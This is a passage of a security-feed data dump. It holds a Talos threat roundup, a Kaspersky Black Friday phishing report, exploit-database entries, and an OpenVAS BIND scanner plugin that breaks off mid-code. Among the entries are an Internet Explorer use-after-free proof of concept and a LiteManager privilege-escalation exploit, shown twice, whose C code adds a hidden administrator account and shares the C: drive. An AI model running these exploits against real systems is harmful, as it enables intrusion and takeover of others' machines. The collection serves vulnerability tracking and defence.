\nInstallcore adware detected \\- (104) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (60) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nEmotet malware detected \\- (45) \nEmotet is a banking Trojan that first appeared in the summer of 2014. It uses Automatic Transfer System (ATS) to steal money from a victim's bank account. The Trojan is distributed through spam that includes a malicious attachment or a link that downloads the Trojan. Emotet uses modules, downloaded by the original Trojan to grab Microsoft Outlook information, modify HTTP/HTTPS traffic and distribute spam. Once executed, it checks for virtual machine processes and injects code into the \"Explorer.exe\" process. Then it reaches out to its command network to download its modules, each of which can be run without the original loader. \nSpecial Search Offer adware \\- (31) \nSpecial Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware. \n \n![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/EYfImS9iSMQ)", "modified": "2019-11-22T09:57:20", "published": "2019-11-22T09:57:20", "id": "TALOSBLOG:F707E3F271E987A8739DBDECFEEFAE22", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/EYfImS9iSMQ/threat-roundup-1115-1122.html", "type": "talosblog", "title": "Threat Roundup for November 15 to November 22", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2019-11-22T10:25:21", "bulletinFamily": "blog", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/15094111/black_friday_intro-990x400.jpg)\n\nEvery year, Kaspersky releases an annual Black Friday alert to highlight how fraudsters may capitalize on increased levels of online shopping at this time of year when many brands are offering their customers appealing discounts. In the rush to get a big discount or, even more panic-inducing, a limited time offer, many shoppers lose all sense of vigilance. Caution goes out the window and consumers start tapping on links and email vouchers without their usual care and attention.\n\n## **Spam and Phishing **\n\nUnfortunately, online shopping at this time of year needs more security-awareness, not less. It is the peak season for phishers and spammers. Along with many genuine offers, there also lurk [phishing](<https://encyclopedia.kaspersky.com/glossary/phishing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) scams ready to reel in an unwitting bargain hunter's bank details. By clicking on a too-good-to-be-true discount link online without checking it's genuine, you could find yourself at a fake marketplace, that may look indistinguishable from the real website. On these sites, entering your bank details could result in money leaving your account, but no package arriving at your door.\n\nSince Kaspersky has been analyzing financial phishing activity, which began in 2013, there has been a steady rise in threats \u2013 peaking at 54% in 2017. However, last year this trend did slow down and decrease. The figure dropped to 44.70%. Financial phishing attacks are still expected to be a big risk around the upcoming Black Friday event, and there will be close analysis to see if the figure rises once more.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22081152/black-friday-report-2019-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22081152/black-friday-report-2019-1.png>)\n\nShare of financial phishing attacks from all phishing decreased for the first time in four years in 2018\n\n## **Social Engineering in the Retail Sector**\n\n### **How do phishing scams work?**\n\nIn order to make these scams a success, fraudsters need to lure their potential victims to fake webpages and obtain their bank details. To do this, attackers register website domains, often containing the magic phrase 'Black Friday' and keep their registration data hidden.\n\nTheir sites are usually well designed and appear to be genuine and of a high quality. Unlike many old typo-filled spam emails, phishing web pages are relatively easy to make look authentic \u2013 scammers can simply copy the source code from the real store's website and make theirs appear to be a near perfect match.\n\nDomain addresses are usually hidden until the event itself, so they are not blocked in advance by antivirus software vendors. The scam website is then activated immediately before the phishing mail goes out, just as shown in these screenshots.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22081219/black-friday-report-2019-2.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22081219/black-friday-report-2019-2.png>)\n\nOccasionally, these attacks appear to be sent by large banks or payment systems, allegedly partners of the Black Friday sales campaign, while in fact these are carefully crafted copies of legitimate pages and mailshots made by criminals. Emails or warnings may threaten to block the user's account or promise some financial benefits by clicking on the email. These phishing emails make it seem like all you have to do is follow the link and log in to your account.\n\nHowever, if you do log in to these sites with your credentials, all your bank account or payment card data \u2014 such as card numbers or usernames and passwords \u2014 will be leaked to the scammers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22083250/black-friday-report-2019-3.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22083250/black-friday-report-2019-3.png>)\n\nOnce they have this data, scammers could be able to withdraw money from your account, sell your bank card details on the dark web, or spend your money in various ways. This is often carried out by teams in other countries.\n\nThese scams come in a variety of forms. In one example, scammers offer goods at crazy discounts, encouraging the victim to share their bank card details, thereby risking losing all of their account funds and of course, not receiving their order. In another scheme, the victim might be tricked into transferring money to the attacker's account, after which the fraudster breaks off all contact and the funds are lost.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22081458/black-friday-report-2019-4.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22081458/black-friday-report-2019-4.png>)\n\nThere is also another widespread and very successful phishing scheme which asks users to complete a survey and fill in a large registration form, along with bank card details to take part in the promotion. After completing the form, you're asked to send a link to the website to 10 friends via a messenger app.\n\nOf course, victims of this scam won't ever receive any prizes but instead end up bombarded with various links and emails for more useless surveys. Any additional clicks on these survey usually mean that scammers receive even more money. Because the survey is shared through messenger apps, more users, who often trust links that come from their friends, might also fall for the trick. And so the cycle continues.\n\n### **Where are phishing scams occurring?**\n\nAccording to our statistics, more than half of phishing attacks carried out in the digital retail space are in the payment sector - online stores, payment systems and banks. Frequently, criminals use brands of Amazon, eBay and Alibaba to trick users. Amazon was used as a disguise in more than a million attacks in the first three quarters of 2019 alone, as the graph below shows.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22082834/black-friday-report-2019-5.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22082834/black-friday-report-2019-5.png>)\n\n_Online retailers most hit by phishing attacks during Q1-Q3 2019_\n\nNotably, the share of phishing incidents in the online retail space during the peak sales period significantly increased compared to what happens during the rest of the year. For instance, attacks that were using the eBay brand reached nearly 25,000 during the week of November 4th, 2018, two weeks before Black Friday, after experiencing minimal disruption in the preceding days. The Amazon disguise was also a key target for scammers too \u2013 facing more than 20,000 phishing attacks during the week of November 19th, 2018, which was the week of Black Friday last year.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22082401/black-friday-report-2019-6.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22082401/black-friday-report-2019-6.png>)\n\n_Spikes in phising attacks on online marketplaces from August - December 2018_\n\nThese 2018 findings allow us to predict that in 2019 the situation may repeat.\n\n## **Banking trojans**\n\nSimilarly to phishing scams, Banking Trojans also target e-commerce brands so that they can track down user credentials \u2013 like banking login details, passwords, bank card numbers or phone numbers.\n\nBut with Trojans, the malware can intercept data fields on targeted websites. This means they can modify online page content and steal credentials entered, while the victim will keep thinking that they enter login and password to legitimate fields on the website. Because of this, cybercriminals can monitor a hacked user's online behavior, such as which sites they visit while on the infected device.\n\nOnce the user browses to one of the targeted e-commerce websites, the Trojan activates its form-grabbing functionality and saves all the data a user inputs on the website. On an e-commerce website, this means a credit or debit card number, expiration date and CVV, as well as your site login credentials.\n\nIf the site or user's bank doesn't feature two-factor authentication, then the criminals behind the Trojan will have access to all this data and can use it to empty the user's bank account or use their card details for purchases.\n\nIn the first three quarters of 2019, Kaspersky discovered 15 families of financial malware targeted at users of popular brands. In addition to the already known banking families such as Zeus, Betabot, Cridex and Gozi, this year, we have also seen two mobile banking Trojans joining our list: Anubis and Gustuff.\n\n[Last year's report](<https://securelist.com/black-friday-alert/88856/>) saw a 10% increase in the detection rate of financial malware between 2017 and 2018[1], but over the course of the full year that growth was a far more significant 24%. More than 15 million attacks by banking Trojans have been registered in the first three quarters of 2019. This means we have already seen a nine percent increase on what was found during 2018. \n\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22082556/black-friday-report-2019-7.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22082556/black-friday-report-2019-7.png>)\n\n_Overall number of attacks by Banking Trojans, 2015 \u2013 2019_\n\nMobile Trojans are also able to steal user credentials. The common scenario for user account theft on mobile devices is an [overlay-attack](<https://encyclopedia.kaspersky.com/glossary/overlay-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), which overlays windows from the hacker's program on top of the app, or window the user is browsing. Often the overlayed window or data input form is identical to the real one and the user enters their data believing that they are dealing with the original program.\n\n## **Targeted e-commerce categories**\n\nIn 2019, we found those 15 malware families were targeting a total of 91 consumer e-commerce sites and mobile apps across the world.\n\nOf those, consumer goods websites such as fashion and clothing, or toys and jewelry, were the most commonly targeted, with 28 websites falling into this category. Also popular with phishing scams are entertainment websites with 20 examples found and travel bookings with 15 in that category.\n\nSurprisingly, sites which sell big ticket items, such as consumer electronics (two websites found) and telecoms (12 websites), which are popular purchases on Black Friday, are at the bottom of the list.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22082120/black-friday-report-2019-8.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/22082120/black-friday-report-2019-8.png>)\n\n_Proportion of e-commerce categories targeted by malware in Q1-Q3 2019_ \n \nConsumer apparel (fashion, shoes, gifts, toys, jewelry, department store) | 28 \nEntertainment (cinema, games etc.) | 20 \nTravel (Flights, taxi, hotels, etc.) | 15 \nOnline retail platform (eBay, Alibaba group etc.) | 14 \nTelecoms | 12 \nConsumer electronics | 2 \n \n_Proportion of e-commerce categories targeted by malware in 2019, by number of targeted brands_\n\n## **Advice and recommendations**\n\nAs shown in this overview, Black Friday offers a golden opportunity for fraudsters and scammers to steal consumers' cash. Sometimes a deal can seem too-good-to-be-true, but retailers still offer great discounts at this time of year, so it's important to examine every deal closely. Shopping around for a bargain can still be enjoyable, it just needs extra vigilance to make sure you can tell the difference between the must-have offers and fake promotions. With incidents of phishing and banking Trojans on the rise, it's important to stay safe from cyberthreats during the peak Black Friday shopping season.\n\nTo stay safe and keep your hard-earned money secure while shopping online, Kaspersky recommends taking the following security measures:\n\nIf you are a consumer:\n\n * Avoid shopping from websites that appear suspicious or flawed, no matter how great their Black Friday deals are\n * Don't click on unfamiliar links you receive in emails or social media messages, even from people you know, unless you were expecting the message\n * Double check the email address of the sender. If it not the official brand's website domain, do not click on the link\n * Hover over the linked text in the email or message and see which URL it will actually open\n * Invest in a robust cybersecurity solution to protect all your devices you use to shop online\n * Think about how much money you wish to spend in an online payment transaction account at any one time\n * Reduce the amount of funds you have in your bank and online accounts. The greater the balance, the more can be lost to fraudsters\n * Restrict the number of attempted transactions on your bank card\n * Turn on and always use two-factor authentication (Verified by Visa, MasterCard Secure Code, etc.)\n\nIf you are an online brand or retailer:\n\n * Use a reputable payment service and keep your online trading and payment platform software up to date. Every new update may contain critical patches to make the system less vulnerable to cybercriminals\n * Use a tailored IT and cybersecurity solution to protect your business and customers\n * Pay attention to the personal information used by customers who buy from you. Use a fraud prevention solution that you can adjust to your company profile and the profile of your customers\n\n_All research used in this report is based on user data obtained with consent and processed using the Kaspersky Security Network (KSN). All referenced banking Trojan malware were detected and blocked by Kaspersky security solutions._", "modified": "2019-11-22T09:04:02", "published": "2019-11-22T09:04:02", "id": "SECURELIST:65356D0BA4848648CB9FB7D11C4B4B32", "href": "https://securelist.com/black-friday-report-2019/95109/", "type": "securelist", "title": "Black Friday Alert 2019: Net Shopping Bag of Threats", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2019-11-22T12:27:24", "bulletinFamily": "exploit", "description": "", "modified": "2019-11-22T00:00:00", "published": "2019-11-22T00:00:00", "id": "EDB-ID:47707", "href": "https://www.exploit-db.com/exploits/47707", "type": "exploitdb", "title": "Internet Explorer - Use-After-Free in JScript Arguments During toJSON Callback", "sourceData": "There is a use-after-free issue in JSCript (triggerable via Internet Explorer) where the members of the 'arguments' object aren't tracked by the garbage collector during the 'toJSON' callback. Thus, during the 'toJSON' callback, it is possible to assign a variable to the 'arguments' object, have it garbage-collected (as long as it is not referenced anywhere else) and still access it later. Note that, like in some previously reported JSCript issues, this is a use-after-free on a JSCript variable (VAR structure), so in order to trigger a crash, the entire block of variables must be freed.\r\n\r\nPoC for Internet Explorer is below. I tested it on multiple Windows version with the latest security patches applied.\r\n\r\n===========================================================\r\n\r\n\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>\r\n<script language=\"Jscript.Encode\">\r\n var spray = new Array();\r\n\r\n function F() {\r\n alert('callback');\r\n\r\n // 2. Create a bunch of objects\r\n for (var i = 0; i < 20000; i++) spray[i] = new Object();\r\n\r\n // 3. Store a reference to one of them in the arguments array\r\n // The arguments array isn't tracked by garbage collector\r\n arguments[0] = spray[5000];\r\n\r\n // 4. Delete the objects and call the garbage collector\r\n // All JSCript variables get reclaimed... \r\n for (var i = 0; i < 20000; i++) spray[i] = 1;\r\n CollectGarbage();\r\n\r\n // 5. But we still have reference to one of them in the\r\n // arguments array\r\n alert(arguments[0]);\r\n }\r\n\r\n // 1. Cause toJSON callback to fire\r\n var o = {toJSON:F}\r\n JSON.stringify(o);\r\n\r\n alert('done');\r\n\r\n</script>\r\n\r\n===========================================================\r\n\r\n\r\nDebug log:\r\n\r\n===========================================================\r\n\r\n(1cf4.154): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=00000080 ebx=05ecc218 ecx=00000080 edx=00000001 esi=05f0c3c8 edi=05fb12e8\r\neip=6e25f52a esp=05ecc180 ebp=05ecc1b4 iopl=0 nv up ei pl zr na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\njscript!PrepareInvoke+0x12a:\r\n6e25f52a 0fb707 movzx eax,word ptr [edi] ds:002b:05fb12e8=????\r\n\r\n0:009> k\r\n # ChildEBP RetAddr \r\n00 05ecc1b4 6e262b75 jscript!PrepareInvoke+0x12a\r\n01 05ecc2a8 6e2660ee jscript!VAR::InvokeByDispID+0x1c5\r\n02 05ecc4a0 6e26244a jscript!CScriptRuntime::Run+0x2e4e\r\n03 05ecc594 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa\r\n04 05ecc5ec 6e25bec9 jscript!ScrFncObj::Call+0x81\r\n05 05ecc68c 6e262aed jscript!NameTbl::InvokeInternal+0x399\r\n06 05ecc78c 6e2a862c jscript!VAR::InvokeByDispID+0x13d\r\n07 05ecc800 6e2a8c2e jscript!GCProtectKeyAndCall+0xed\r\n08 05ecc898 6e2a93ce jscript!JSONApplyFilters+0x125\r\n09 05ecc90c 6e2ad9a2 jscript!JSONStringifyObject+0xac\r\n0a 05ecc9b4 6e269e3a jscript!JsJSONStringify+0x382\r\n0b 05ecca1c 6e25bec9 jscript!NatFncObj::Call+0xea\r\n0c 05eccabc 6e25e476 jscript!NameTbl::InvokeInternal+0x399\r\n0d 05eccc78 6e262aa5 jscript!VAR::InvokeByName+0x8f6\r\n0e 05eccd70 6e2660ee jscript!VAR::InvokeByDispID+0xf5\r\n0f 05eccf68 6e26244a jscript!CScriptRuntime::Run+0x2e4e\r\n10 05ecd05c 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa\r\n11 05ecd0b4 6e257124 jscript!ScrFncObj::Call+0x81\r\n12 05ecd170 6e257f75 jscript!CSession::Execute+0x314\r\n13 05ecd1d0 6e256c83 jscript!COleScript::ExecutePendingScripts+0x2d5\r\n14 05ecd274 6e2569b9 jscript!COleScript::ParseScriptTextCore+0x2c3\r\n15 05ecd2a0 70209251 jscript!COleScript::ParseScriptText+0x29\r\n16 05ecd2d8 70122a27 MSHTML!CActiveScriptHolder::ParseScriptText+0x51\r\n17 05ecd348 70121fe2 MSHTML!CScriptCollection::ParseScriptText+0x182\r\n18 05ecd434 701226ee MSHTML!CScriptData::CommitCode+0x312\r\n19 05ecd4b0 7012153a MSHTML!CScriptData::Execute+0x1ba\r\n1a 05ecd4d0 701e99b6 MSHTML!CHtmScriptParseCtx::Execute+0xaa\r\n1b 05ecd524 70159c7d MSHTML!CHtmParseBase::Execute+0x186\r\n1c 05ecd544 70159599 MSHTML!CHtmPost::Broadcast+0xfd\r\n1d 05ecd66c 7017647d MSHTML!CHtmPost::Exec+0x339\r\n1e 05ecd68c 70176376 MSHTML!CHtmPost::Run+0x3d\r\n1f 05ecd6ac 70176308 MSHTML!PostManExecute+0x60\r\n20 05ecd6c0 70176279 MSHTML!PostManResume+0x6f\r\n21 05ecd6f0 70208447 MSHTML!CHtmPost::OnDwnChanCallback+0x39\r\n22 05ecd708 7015be1d MSHTML!CDwnChan::OnMethodCall+0x27\r\n23 05ecd780 702f1207 MSHTML!GlobalWndOnMethodCall+0x1bd\r\n24 05ecd7d0 7015c5a2 MSHTML!GlobalWndProc_SEH+0x317\r\n25 05ecd7ec 7562624b MSHTML!GlobalWndProc+0x52\r\n26 05ecd818 756174dc USER32!_InternalCallWinProc+0x2b\r\n27 05ecd8fc 7561661b USER32!UserCallWinProcCheckWow+0x3ac\r\n28 05ecd970 756163f0 USER32!DispatchMessageWorker+0x21b\r\n29 05ecd97c 717e6456 USER32!DispatchMessageW+0x10\r\n2a 05ecfb0c 717e73e3 IEFRAME!CTabWindow::_TabWindowThreadProc+0xa36\r\n2b 05ecfbcc 7223df6c IEFRAME!LCIETab_ThreadProc+0x403\r\n2c 05ecfbe4 7130289d msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c\r\n2d 05ecfc1c 75520419 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d\r\n2e 05ecfc2c 7789662d KERNEL32!BaseThreadInitThunk+0x19\r\n2f 05ecfc88 778965fd ntdll!__RtlUserThreadStart+0x2f\r\n30 05ecfc98 00000000 ntdll!_RtlUserThreadStart+0x1b\r\n\r\n===========================================================", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/47707"}, {"lastseen": "2019-11-22T12:27:24", "bulletinFamily": "exploit", "description": "", "modified": "2019-11-22T00:00:00", "published": "2019-11-22T00:00:00", "id": "EDB-ID:47706", "href": "https://www.exploit-db.com/exploits/47706", "type": "exploitdb", "title": "LiteManager 4.5.0 - Insecure File Permissions", "sourceData": "\ufeff# Exploit Title: LiteManager 4.5.0 - Insecure File Permissions\r\n# Exploit Author: ZwX\r\n# Exploit Date: 2019-11-21\r\n# Vendor Homepage : LiteManager Team\r\n# Software Link: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support\r\n# Tested on OS: Windows 7 \r\n\r\n\r\n# Proof of Concept (PoC):\r\n==========================\r\n\r\n\r\nC:\\Program Files\\LiteManagerFree - Server>icacls *.exe\r\nROMFUSClient.exe Everyone:(F)\r\n AUTORITE NT\\Syst\u00e8me:(I)(F)\r\n BUILTIN\\Administrateurs:(I)(F)\r\n BUILTIN\\Utilisateurs:(I)(RX)\r\n\t\t\t\t \r\n\t\t\t\t \r\n#Exploit code(s): \r\n=================\r\n\r\n1) Compile below 'C' code name it as \"ROMFUSClient.exe\"\r\n\r\n#include<windows.h>\r\n\r\nint main(void){\r\n system(\"net user hacker abc123 /add\");\r\n system(\"net localgroup Administrators hacker /add\");\r\n system(\"net share SHARE_NAME=c:\\ /grant:hacker,full\");\r\n WinExec(\"C:\\\\Program Files\\\\LiteManagerFree\\\\~ROMFUSClient.exe\",0);\r\nreturn 0;\r\n} \r\n\r\n2) Rename original \"ROMFUSClient.exe\" to \"~ROMFUSClient.exe\"\r\n3) Place our malicious \"ROMFUSClient.exe\" in the LiteManagerFree directory\r\n4) Disconnect and wait for a more privileged user to connect and use ROMFUSClient IDE. \r\nPrivilege Successful Escalation", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47706"}, {"lastseen": "2019-11-22T12:27:24", "bulletinFamily": "exploit", "description": "", "modified": "2019-11-22T00:00:00", "published": "2019-11-22T00:00:00", "id": "EDB-ID:47705", "href": "https://www.exploit-db.com/exploits/47705", "type": "exploitdb", "title": "ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path", "sourceData": "\ufeff#Exploit Title: ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path\r\n#Exploit Author : ZwX\r\n#Exploit Date: 2019-11-21\r\n#Vendor Homepage : http://www.photodex.com/\r\n#Link Software : http://files.photodex.com/release/pspro_90_3797.exe\r\n#Tested on OS: Windows 7\r\n\r\n\r\n#Analyze PoC :\r\n==============\r\n\r\n\r\nC:\\Users\\ZwX>sc qc ScsiAccess\r\n[SC] QueryServiceConfig r\u00e9ussite(s)\r\n\r\nSERVICE_NAME: ScsiAccess\r\n TYPE : 10 WIN32_OWN_PROCESS\r\n START_TYPE : 2 AUTO_START\r\n ERROR_CONTROL : 1 NORMAL\r\n BINARY_PATH_NAME : C:\\Program Files\\Photodex\\ProShow Producer\\ScsiAccess.exe\r\n LOAD_ORDER_GROUP :\r\n TAG : 0\r\n DISPLAY_NAME : ScsiAccess\r\n DEPENDENCIES :\r\n SERVICE_START_NAME : LocalSystem", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47705"}], "packetstorm": [{"lastseen": "2019-11-23T02:52:31", "bulletinFamily": "exploit", "description": "", "modified": "2019-11-22T00:00:00", "published": "2019-11-22T00:00:00", "id": "PACKETSTORM:155438", "href": "https://packetstormsecurity.com/files/155438/LiteManager-4.5.0-Insecure-File-Permissions.html", "title": "LiteManager 4.5.0 Insecure File Permissions", "type": "packetstorm", "sourceData": "`# Exploit Title: LiteManager 4.5.0 - Insecure File Permissions \n# Exploit Author: ZwX \n# Exploit Date: 2019-11-21 \n# Vendor Homepage : LiteManager Team \n# Software Link: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support \n# Tested on OS: Windows 7 \n \n \n# Proof of Concept (PoC): \n========================== \n \n \nC:\\Program Files\\LiteManagerFree - Server>icacls *.exe \nROMFUSClient.exe Everyone:(F) \nAUTORITE NT\\Syst\u00e8me:(I)(F) \nBUILTIN\\Administrateurs:(I)(F) \nBUILTIN\\Utilisateurs:(I)(RX) \n \n \n#Exploit code(s): \n================= \n \n1) Compile below 'C' code name it as \"ROMFUSClient.exe\" \n \n#include<windows.h> \n \nint main(void){ \nsystem(\"net user hacker abc123 /add\"); \nsystem(\"net localgroup Administrators hacker /add\"); \nsystem(\"net share SHARE_NAME=c:\\ /grant:hacker,full\"); \nWinExec(\"C:\\\\Program Files\\\\LiteManagerFree\\\\~ROMFUSClient.exe\",0); \nreturn 0; \n} \n \n2) Rename original \"ROMFUSClient.exe\" to \"~ROMFUSClient.exe\" \n3) Place our malicious \"ROMFUSClient.exe\" in the LiteManagerFree directory \n4) Disconnect and wait for a more privileged user to connect and use ROMFUSClient IDE. \nPrivilege Successful Escalation \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155438/litemanager450-insecure.txt"}, {"lastseen": "2019-11-23T02:52:31", "bulletinFamily": "exploit", "description": "", "modified": "2019-11-22T00:00:00", "published": "2019-11-22T00:00:00", "id": "PACKETSTORM:155437", "href": "https://packetstormsecurity.com/files/155437/ProShow-Producer-9.0.3797-Unquoted-Service-Path.html", "title": "ProShow Producer 9.0.3797 Unquoted Service Path", "type": "packetstorm", "sourceData": "`#Exploit Title: ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path \n#Exploit Author : ZwX \n#Exploit Date: 2019-11-21 \n#Vendor Homepage : http://www.photodex.com/ \n#Link Software : http://files.photodex.com/release/pspro_90_3797.exe \n#Tested on OS: Windows 7 \n \n \n#Analyze PoC : \n============== \n \n \nC:\\Users\\ZwX>sc qc ScsiAccess \n[SC] QueryServiceConfig r\u00e9ussite(s) \n \nSERVICE_NAME: ScsiAccess \nTYPE : 10 WIN32_OWN_PROCESS \nSTART_TYPE : 2 AUTO_START \nERROR_CONTROL : 1 NORMAL \nBINARY_PATH_NAME : C:\\Program Files\\Photodex\\ProShow Producer\\ScsiAccess.exe \nLOAD_ORDER_GROUP : \nTAG : 0 \nDISPLAY_NAME : ScsiAccess \nDEPENDENCIES : \nSERVICE_START_NAME : LocalSystem \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155437/proshowproducer903797-unquotedpath.txt"}], "openvas": [{"lastseen": "2019-11-22T15:47:44", "bulletinFamily": "scanner", "description": "ISC BIND is prone to a denial of service vulnerability as TCP-pipelined\n queries can bypass tcp-clients limit.", "modified": "2019-11-22T00:00:00", "published": "2019-11-22T00:00:00", "id": "OPENVAS:1361412562310143162", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310143162", "title": "ISC BIND DoS Vulnerability - CVE-2019-6477 (Windows)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:isc:bind\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.143162\");\n script_version(\"2019-11-22T03:02:57+0000\");\n script_tag(name:\"last_modification\", value:\"2019-11-22 03:02:57 +0000 (Fri, 22 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-22 03:02:09 +0000 (Fri, 22 Nov 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_cve_id(\"CVE-2019-6477\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"ISC BIND DoS Vulnerability - CVE-2019-6477 (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"bind_version.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ISC BIND/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"ISC BIND is prone to a denial of service vulnerability as TCP-pipelined\n queries can bypass tcp-clients limit.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"By design, BIND is intended to limit the number of TCP clients that can be\n connected at any given time. The update to this functionality introduced by CVE-2018-5743 changed how BIND\n calculates the number of concurrent TCP clients from counting the outstanding TCP queries to counting the TCP\n client connections. On a server with TCP-pipelining capability, it is possible for one TCP client to send a\n large number of DNS requests over a single connection. Each outstanding query will be handled internally as an\n independent client request, thus bypassing the new TCP clients limit.\");\n\n script_tag(name:\"impact\", value:\"With pipelining enabled each incoming query on a TCP connection requires a\n similar resource allocation to a query received via UDP or via TCP without pipelining enabled. A client using a\n TCP-pipelined connection to a server could consume more resources than the server has been provisioned to handle.\n When a TCP connection with a large number of pipelined queries is closed, the load on the server releasing these\n multiple resources can cause it to become unresponsive, even for queries that can be answered authoritatively\n or from cache.\");\n\n script_tag(name:\"affected\", value:\"BIND 9.11.6-P1 - 9.11.12, 9.12.4-P1 - 9.12.4-P2, 9.14.1 - 9.14.7 and\n 9.11.5-S6 - 9.11.12-S1. Also affects all releases in the 9.15 development branch.\");\n\n script_tag(name:\"solution\", value:\"Update to version 9.11.13, 9.14.8, 9.15.6, 9.11.13-S1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://kb.isc.org/docs/cve-2019-6477\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif(!infos = get_app_version_and_proto(cpe: CPE, port: port, exit_no_version: TRUE)) exit(0);\nversion = infos[\"version\"];\nproto = infos[\"proto\"];\n\nif (version !~ \"^9\\.\")\n exit(99);\n\nif (version =~ \"^9\\.11\\.[0-9]\\.S[0-9]\") {\n if (version_in_range(version: version, test_version: \"9.11.5.S6\", test_version2: \"9.11.12.S1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"9.11.13-S1\");\n security_message(port: port, data: report, proto: proto);\n exit(0);\n }\n} else {\n if (version_in_range(version: version, test_version: \"9.11.6.P1\", test_version2: \"9.11.12\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"9.11.13\");\n security_message(port: port, data: report, proto: proto);\n exit(0);\n }\n\n if (version_in_range(version: version, test_version: \"9.12.4.P1\", test_version2: \"9.12.4.P2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"9.14.8\");\n security_message(port: port, data: report, proto: proto);\n exit(0);\n }\n\n if (version_in_range(version: version, test_version: 